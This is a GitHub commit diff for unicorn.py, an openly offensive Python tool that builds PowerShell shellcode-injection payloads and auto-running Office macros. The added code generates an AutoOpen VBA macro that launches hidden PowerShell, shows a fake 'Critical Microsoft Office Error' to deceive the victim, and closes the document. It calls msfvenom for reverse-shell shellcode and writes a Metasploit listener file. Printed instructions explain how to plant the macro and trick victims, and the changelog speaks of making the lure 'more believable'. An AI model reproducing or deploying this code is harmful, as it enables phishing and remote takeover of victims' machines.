Skip to content

Commit

Permalink
Update to version 1.1 better macro support
Browse files Browse the repository at this point in the history
  • Loading branch information
root committed Apr 22, 2015
1 parent fd8cd18 commit 2e1d8fb
Show file tree
Hide file tree
Showing 2 changed files with 102 additions and 45 deletions.
11 changes: 11 additions & 0 deletions CHANGELOG.txt
View file
Original file line number Diff line number Diff line change
@@ -1,3 +1,14 @@
~~~~~~~~~~~~~~~~
version 1.1
~~~~~~~~~~~~~~~~

* fixed autoopen from not working on some office implementations - now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload

~~~~~~~~~~~~~~~~
version 1.0
~~~~~~~~~~~~~~~~
Expand Down
136 changes: 91 additions & 45 deletions unicorn.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,21 +19,64 @@
import subprocess
import sys

def gen_unicorn():
print r"""
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
"""


# split string
def split_str(s, length):
return [s[i:i+length] for i in range(0, len(s), length)]

# generate full macro
def genMacro(full_attack):
#start of the macro
macro_str = """Sub Auto_Open()
macro_str = """Sub AutoOpen()
Dim x
x = """
linelength = 380
powershell_command_list = split_str(full_attack, linelength)

for line in powershell_command_list:
macro_str += "& \"" + line + "\" _\r\n"
macro_str += "& \"" + line + "\" _\n"

# remove trailing "_ \r\n"
macro_str = macro_str[:-4]
Expand All @@ -44,10 +87,10 @@ def genMacro(full_attack):
macro_str += """
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical error"
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "An error has occurd while decrypting the file. Excel is unable to continue."
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Expand All @@ -56,6 +99,7 @@ def genMacro(full_attack):

# generate base shellcode
def generate_shellcode(payload,ipaddr,port):
print "[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode..."
port = port.replace("LPORT=", "")
proc = subprocess.Popen("msfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform windows -f c" % (payload,ipaddr,port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
data = proc.communicate()[0]
Expand Down Expand Up @@ -108,8 +152,49 @@ def format_payload(payload, ipaddr, port, macro):
filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (payload,ipaddr,port))
filewrite.close()

gen_unicorn()
print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)"
print "Twitter: @TrustedSec, @HackingDave"
print "\nHappy Magic Unicorns."

if len(macro) > 30:
print """
[*******************************************************************************************************]
-----MACRO ATTACK INSTRUCTIONS----
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you
do that, you will have a developer tab. Create a new macro, call it AutoOpen and paste the generated
code into that. This will automatically run. Note that a message will prompt to the user saying that
the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is
tricking the victim to thinking the excel document is corrupted. You should get a shell through
powershell injection after that.
NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED
TO REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR
WILL HAPPEN!
[*******************************************************************************************************]
"""

print """
[*******************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains
all of the code needed in order to inject the powershell attack into memory. Note you will need a place
that supports remote command injection of some sort. Often times this could be through an excel/word
doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and
scenarios to where you can use this attack at. Simply paste the powershell_attacks.txt command in
any command prompt window or where you have the ability to call the powershell executable and it
will give a shell back to you. Note that you will need to have a listener enabled in order to capture
the attack.
[*******************************************************************************************************]
"""
print "[*] Exported powershell output code to powershell_attack.txt."
print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener."


# pull the variables needed for usage
try:
Expand All @@ -132,46 +217,7 @@ def format_payload(payload, ipaddr, port, macro):

# if we did supply parameters
elif len(sys.argv) < 3:
print r"""
,/
//
,//
___ /| |//
`__/\_ --(/|___/-/
\|\_-\___ __-_`- /-/ \.
|\_-___,-\_____--/_)' ) \
\ -_ / __ \( `( __`\|
`\__| |\)\ ) /(/|
,._____., ',--//-| \ | ' /
/ __. \, / /,---| \ /
/ / _. \ \ `/`_/ _,' | |
| | ( ( \ | ,/\'__/'/ | |
| \ \`--, `_/_------______/ \( )/
| | \ \_. \, \___/\
| | \_ \ \ \
\ \ \_ \ \ / \
\ \ \._ \__ \_| | \
\ \___ \ \ | \
\__ \__ \ \_ | \ |
| \_____ \ ____ | |
| \ \__ ---' .__\ | | |
\ \__ --- / ) | \ /
\ \____/ / ()( \ `---_ /|
\__________/(,--__ \_________. | ./ |
| \ \ `---_\--, \ \_,./ |
| \ \_ ` \ /`---_______-\ \\ /
\ \.___,`| / \ \\ \
\ | \_ \| \ ( |: |
\ \ \ | / / | ;
\ \ \ \ ( `_' \ |
\. \ \. \ `__/ | |
\ \ \. \ | |
\ \ \ \ ( )
\ | \ | | |
| \ \ \ I `
( __; ( _; ('-_';
|___\ \___: \___:
"""
gen_unicorn()
print "-------------------- Magic Unicorn Attack Vector -----------------------------"
print "\nReal quick down and dirty for native x86 powershell injection on any platform"
print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)"
Expand Down

0 comments on commit 2e1d8fb

Please sign in to comment.